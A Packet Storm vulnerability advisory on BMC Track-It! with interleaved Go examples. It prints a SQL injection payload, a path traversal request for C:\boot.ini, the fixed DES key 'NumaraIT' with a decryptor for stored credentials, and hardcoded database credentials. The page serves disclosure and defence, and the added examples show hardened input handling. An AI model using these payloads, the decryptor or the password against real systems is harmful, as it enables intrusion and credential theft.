
BMC Track-it! Remote Code Execution / SQL Injection

Posted Oct 8, 2014
Authored by Pedro Ribeiro

BMC Track-it! suffers from code execution, arbitrary file download, and remote SQL injection vulnerabilities.

tags | exploit, remote, arbitrary, vulnerability, code execution, sql injection
advisories | CVE-2014-4872, CVE-2014-4873, CVE-2014-4874
SHA-256 | 424ad45a542a874674f55fda959776d2554f26182771fb01a177badef46cb578


tl;dr - I am releasing two 0-day exploits for BMC Track-It!. One is an
RCE and the other gets you the domain admin and SQL database creds.
Other minor vulns are also disclosed. Details below.

CERT handled the disclosure for these vulnerabilities (see CERT
VU#121036) and according to them BMC didn't even acknowledge the issue
for 45 days.

BMC have contacted me directly today, but it's too late now, the cat
is out of the bag as the CERT advisory has been published. Any
vulnerability researcher worth their salt will be able to work out how
to exploit these issues, so there is no point in holding back on
releasing the exploits.

The exploits have been submitted to Metasploit and should be released soon, see:

>> Multiple critical vulnerabilities in BMC Track-It!
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security

The application exposes several .NET remoting services on port 9010.
.NET remoting is an RMI technology similar to Java RMI or CORBA which
allows a client to invoke methods remotely and retrieve their results. In
BMC Track-It!, the .NET remoting services are unauthenticated and
unencrypted, meaning that anyone who can reach the port can invoke all
the exposed methods.

It is possible to capture traffic and decode the packet format by
looking at the (incomplete) Microsoft .NET remoting specifications.
Using these techniques, two Metasploit modules were produced: one is an
exploit module that can upload arbitrary files to the web root and
achieve remote code execution, and the other is an auxiliary module
that retrieves the SQL and domain administrator credentials.

Three other vulnerabilities (SQL injection, arbitrary file download
and hardcoded database credentials) were also discovered.

A special thanks to CERT for handling the communication to BMC and the
disclosure of these vulnerabilities. These issues are tracked by CERT
as VU#121036 (http://www.kb.cert.org/vuls/id/121036).

>> Background on the affected product:
"Track-It! IT Help Desk Software includes everything you need for IT
Help Desk management. Full featured, easy to deploy, easy to use and
cost-effective, Track-It! Help Desk is designed specifically with the
needs of small to mid-sized organizations in mind.
Over 55,000 organizations worldwide have trusted Track-It! for their
IT help desk ticketing and asset management needs. Track-It! IT Help
Desk Software includes, helpdesk, work order ticket tracking, incident
and problem management, knowledge management, service level
management, asset management, change management, software license
management, mobile device access, end-user self-service and more.
Track-It! Help Desk delivers the strength of ITSM best practices with
the simplicity of smooth installation and quick configuration to
provide instant return on your investment."

>> Technical details:
#1 Domain administrator and SQL server user credentials disclosure
Versions affected: 9 to 11.3+ (version 8 might be affected, but could
not be confirmed)
CVE-2014-4872

The application exposes an unauthenticated .NET remoting configuration
service (ConfigurationService) on port 9010.
This service contains a method that returns a configuration file
holding the application database name, username and password, as well
as the domain administrator username and password. These values are
encrypted with DES using a fixed key and IV, both the string "NumaraIT",
so anyone who obtains the file can decrypt them. The domain
administrator username and password can only be obtained if the
Self-Service component is enabled, which is the most common scenario in
enterprise deployments.
A Metasploit module that exploits this vulnerability has been released.
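As an added illustration of why a fixed key and IV are no protection, the following Go program (written for this page, not code from the advisory or from the Metasploit module) decrypts a configuration value under the key/IV "NumaraIT". It assumes DES in CBC mode with PKCS#7 padding (the defaults of .NET's DESCryptoServiceProvider) and a base64 text encoding of the stored field; the advisory states only the algorithm and the key/IV, so mode, padding and encoding are assumptions. The sample ciphertext is constructed inside the program by encrypting the hardcoded password from #5, because no real configuration file is available offline.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"encoding/base64"
	"errors"
	"fmt"
)

// The advisory names a fixed DES key and IV: the ASCII string "NumaraIT",
// eight bytes, i.e. exactly one DES block. Anyone holding the configuration
// file can therefore decrypt every secret in it.
var (
	numaraKey = []byte("NumaraIT")
	numaraIV  = []byte("NumaraIT")
)

// decryptDES decrypts a DES-CBC ciphertext under the fixed key/IV and strips
// PKCS#7 padding. CBC and PKCS#7 are the defaults of .NET's
// DESCryptoServiceProvider; that they were used here is an assumption of this
// example, not a statement from the advisory.
func decryptDES(ct []byte) ([]byte, error) {
	block, err := des.NewCipher(numaraKey)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	if len(ct) == 0 || len(ct)%bs != 0 {
		return nil, errors.New("ciphertext length is not a multiple of the DES block size")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, numaraIV).CryptBlocks(pt, ct)
	// PKCS#7: the last byte gives the pad length, and every pad byte has that value.
	n := int(pt[len(pt)-1])
	if n < 1 || n > bs {
		return nil, errors.New("bad PKCS#7 padding")
	}
	for _, b := range pt[len(pt)-n:] {
		if int(b) != n {
			return nil, errors.New("bad PKCS#7 padding")
		}
	}
	return pt[:len(pt)-n], nil
}

// decryptField handles the base64 text form a .NET application would
// typically store (Convert.ToBase64String); the encoding is assumed.
func decryptField(b64 string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	pt, err := decryptDES(ct)
	if err != nil {
		return "", err
	}
	return string(pt), nil
}

// encryptDES is the inverse. It exists only so the example can build a
// constructed sample offline; the real data comes from the service.
func encryptDES(pt []byte) ([]byte, error) {
	block, err := des.NewCipher(numaraKey)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	pad := bs - len(pt)%bs
	padded := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, numaraIV).CryptBlocks(ct, padded)
	return ct, nil
}

func main() {
	// Constructed sample: the hardcoded SQL Express password from #5,
	// "encrypted" the way the configuration file would carry it.
	ct, _ := encryptDES([]byte("TI_DB_P@ssw0rd"))
	field := base64.StdEncoding.EncodeToString(ct)
	secret, err := decryptField(field)
	fmt.Printf("stored: %s\nrecovered: %s (err=%v)\n", field, secret, err)
}
```

The point of the padding and length checks is that a recovered field which fails them tells you the mode or encoding assumption is wrong, rather than silently returning garbage; when running this against a real file, that is the first thing to look at.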

#2 Remote code execution via file upload (unauthenticated)
Versions affected: 8 to 11.3+
CVE-2014-4872 (same as #1)

The application exposes an unauthenticated .NET remoting file storage
service (FileStorageService) on port 9010.
This service contains a method that allows uploading a file to an
arbitrary path on the machine that is running Track-It!. This can be
used to upload a file to the web root and achieve code execution as
A Metasploit module that exploits this vulnerability has been released.

#3 Blind SQL injection (authenticated)
Versions affected: Unknown, at least 11.3

POST /TrackItWeb/Grid/GetData
= 51)) blag; $CREATE TABLE lol(lulz text);$ select woid from (select
woid, row_number() over (ORDER BY woid) RowNumber from z$vTASKS_BROWSE
-- ","comparison":"=","value":51}]

The application accepts injected SQL between the two $ markers.
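To make the defect class in #3 concrete, here is an added Go example (written for this page; it is not the Track-It! code and the real query text is not known) contrasting a grid filter that is spliced into the statement with one that is parameterised. The field/comparison/value shape of a filter entry and the woid column and z$vTASKS_BROWSE view come from the request shown above; the column allowlist beyond woid, the operator allowlist and the @pN placeholder style are assumptions for the example. The injected value is constructed.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// GridFilter is one entry of the "filters" array a GetData POST carries
// (the field/comparison/value shape is visible in the advisory's request).
type GridFilter struct {
	Field      string
	Comparison string
	Value      string
}

const baseQuery = "SELECT woid FROM z$vTASKS_BROWSE"

// vulnerableQuery reproduces the defect class behind #3: the three
// client-controlled strings are spliced into the statement text, so a value
// that closes the predicate and adds ";" smuggles in a second statement.
func vulnerableQuery(f GridFilter) string {
	return fmt.Sprintf("%s WHERE ((%s %s %s))", baseQuery, f.Field, f.Comparison, f.Value)
}

// columns is an allowlist of filterable grid fields and their SQL types.
// "woid" appears in the advisory; the rest of the list is assumed.
var columns = map[string]string{
	"woid":   "int",
	"status": "text",
}

// operators is the allowlist of comparison tokens the grid may send.
var operators = map[string]bool{"=": true, "<>": true, "<": true, ">": true, "like": true}

// safeQuery builds a parameterised statement: identifiers and operators
// come only from the allowlists, and each value is bound as @pN (SQL Server
// placeholder syntax) after being converted to the column's type.
func safeQuery(filters []GridFilter) (string, []interface{}, error) {
	var preds []string
	var args []interface{}
	for _, f := range filters {
		typ, ok := columns[f.Field]
		if !ok {
			return "", nil, fmt.Errorf("unknown field %q", f.Field)
		}
		op := strings.ToLower(strings.TrimSpace(f.Comparison))
		if !operators[op] {
			return "", nil, fmt.Errorf("unknown operator %q", f.Comparison)
		}
		var v interface{} = f.Value
		if typ == "int" {
			n, err := strconv.Atoi(f.Value)
			if err != nil {
				return "", nil, fmt.Errorf("field %q expects an integer, got %q", f.Field, f.Value)
			}
			v = n
		}
		args = append(args, v)
		preds = append(preds, fmt.Sprintf("[%s] %s @p%d", f.Field, op, len(args)))
	}
	if len(preds) == 0 {
		return baseQuery, nil, nil
	}
	return baseQuery + " WHERE " + strings.Join(preds, " AND "), args, nil
}

func main() {
	// Constructed payload in the spirit of #3: closes the predicate, ends the
	// statement, stacks a CREATE TABLE and comments out the remainder.
	attack := GridFilter{Field: "woid", Comparison: "=", Value: "51)) ; CREATE TABLE lol(lulz text); --"}
	fmt.Println(vulnerableQuery(attack))
	_, _, err := safeQuery([]GridFilter{attack})
	fmt.Println("hardened:", err)
	q, args, _ := safeQuery([]GridFilter{{"woid", "=", "51"}})
	fmt.Println(q, args)
}
```

Note that the operator and field names are not bound as parameters (SQL Server does not allow that), which is why they come from allowlists rather than from escaping; only the value travels as an argument.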

#4 Arbitrary file download (authenticated)
Versions affected: Unknown, at least 11.3

GET /TrackItWeb/Attachment/Open?attachmentType=1&entityId=1337&entityGuid=aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa&fileName=C:\boot.ini
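Both #2 (a caller-chosen upload path) and #4 (a caller-chosen fileName) are the same missing check: the server never confines the name to its storage directory. The Go program below is an added example written for this page, not Track-It! code. vulnerableCombine mimics the documented behaviour of .NET's Path.Combine (a rooted second argument replaces the first, and ".." is never resolved), which is how a value like C:\boot.ini reaches any file on the host; safeJoin is the hardened form. The root directory in the sample is assumed, and the hardened join uses forward slashes because path.Clean is OS-independent.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"strings"
)

var errOutsideRoot = errors.New("name escapes the storage directory")

// isRooted reports whether a client-supplied name is absolute in the Windows
// sense: a drive letter ("C:\...") or a leading separator (incl. UNC "\\srv\...").
func isRooted(name string) bool {
	if len(name) >= 2 && name[1] == ':' {
		return true
	}
	return strings.HasPrefix(name, "\\") || strings.HasPrefix(name, "/")
}

// vulnerableCombine mimics System.IO.Path.Combine, whose documented
// behaviour is to return the second argument unchanged whenever it is
// rooted, and otherwise to join without resolving "..". Used as the only
// check, it hands the caller every file on the host, which is what #2
// (upload) and #4 (download) describe.
func vulnerableCombine(root, name string) string {
	if isRooted(name) {
		return name
	}
	return strings.TrimRight(root, "\\") + "\\" + name
}

// safeJoin is the hardened form: it rejects empty names, NUL bytes, rooted
// names and anything that still points at or above the root after "." and
// ".." are resolved, then joins with forward slashes. A real Windows server
// would do the same with filepath and compare the cleaned absolute result
// against the root.
func safeJoin(root, name string) (string, error) {
	if name == "" || strings.ContainsRune(name, 0) || isRooted(name) {
		return "", errOutsideRoot
	}
	cleaned := path.Clean(strings.ReplaceAll(name, "\\", "/"))
	if cleaned == "." || cleaned == ".." || strings.HasPrefix(cleaned, "../") {
		return "", errOutsideRoot
	}
	return path.Join(strings.ReplaceAll(root, "\\", "/"), cleaned), nil
}

func main() {
	root := `C:\TrackIt\Attachments` // assumed storage directory, for illustration only
	for _, name := range []string{"report.pdf", `..\..\boot.ini`, `C:\boot.ini`, `\\share\x`, `sub\.\a.txt`} {
		p, err := safeJoin(root, name)
		fmt.Printf("%-18q vulnerable=%-45q safe=%q err=%v\n", name, vulnerableCombine(root, name), p, err)
	}
}
```

The UNC case is worth keeping in the test set: a leading \\ is rooted just like a drive letter, so a check that only looks for "C:" lets an attacker read from, or write to, a share of their choosing.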

#5 Hardcoded database credentials
Versions affected: Unknown, at least from 8 to 11.3+

When installed with the built-in SQL Express, Track-It! uses the
following hardcoded database credentials:
Username: TrackIt80_1
Password: TI_DB_P@ssw0rd

>> Fix:
UNFIXED - the vendor refused to acknowledge the vulnerabilities and
did not respond to CERT.
Block all communications from untrusted networks (e.g. the Internet)
to ports 9010 to 9020.
Block the database port if you are using the built in SQL Express
(port 49159 is the default in recent versions).
Ensure you do not have any untrusted users with access to Track-It!.

A copy of this advisory can be found in my repo:



packet storm

© 2022 Packet Storm. All rights reserved.